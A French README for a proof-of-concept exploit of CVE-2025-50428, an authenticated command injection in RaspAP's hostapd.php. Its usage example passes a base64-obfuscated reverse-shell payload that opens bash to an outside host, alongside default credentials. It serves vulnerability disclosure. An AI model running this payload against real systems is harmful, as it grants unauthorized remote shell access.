
Preuve de concept pour la vulnérabilité CVE-2025-50428 : Injection de commandes OS authentifiée dans RaspAP
Un exploit de type preuve de concept pour CVE-2025-50428, une vulnérabilité d'injection de commandes dans RaspAP raspap-webgui 3.2.9 et versions antérieures.
| Identifiant de vulnérabilité | CVE-2025-50428 |
|---|---|
| Gravité | Élevée (CVSS 3.1 : 8.6) |
| Vecteur CVSS | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Type de vulnérabilité | Injection de code |
| Vecteur d'attaque | À distance (authentifié) |
| Privilèges requis | Faibles |
| Impact | Exécution de code, élévation de privilèges |
| Produit concerné | raspap-webgui ≤ 3.2.9 |
| Découvert par | SmartTECS Cyber Security GmbH |
Cet exploit cible une vulnérabilité d'injection de commandes dans le script hostapd.php de RaspAP. La vulnérabilité existe en raison d'un assainissement inadéquat des entrées utilisateur transmises via le paramètre interface. Un attaquant authentifié peut injecter des commandes OS arbitraires, ce qui permet une exécution de code avec les privilèges de l'utilisateur www-data.
requests installéepython3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url : URL de base de l'installation RaspAP (par ex., http://192.168.122.22)--interface : Valeur du paramètre interface, charge utile d'injection autorisée--username : Nom d'utilisateur RaspAP (par défaut : admin)--password : Mot de passe RaspAP (par défaut : secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
www-data.SmartTECS Cyber Security GmbH est une entreprise de cybersécurité spécialisée dans les tests d'intrusion, le développement logiciel sécurisé et la recherche de vulnérabilités. L'entreprise fournit des évaluations de sécurité sur mesure, des services de réponse aux incidents et des services de conseil stratégique pour aider les organisations à protéger leurs systèmes critiques contre les cybermenaces en évolution.
Cet outil est fourni strictement à des fins éducatives et de recherche. Ne l'utilisez que sur des systèmes dont vous êtes propriétaire ou que vous administrez avec une autorisation explicite. L'auteur et SmartTECS Cyber Security GmbH déclinent toute responsabilité en cas d'utilisation abusive ou de dommages.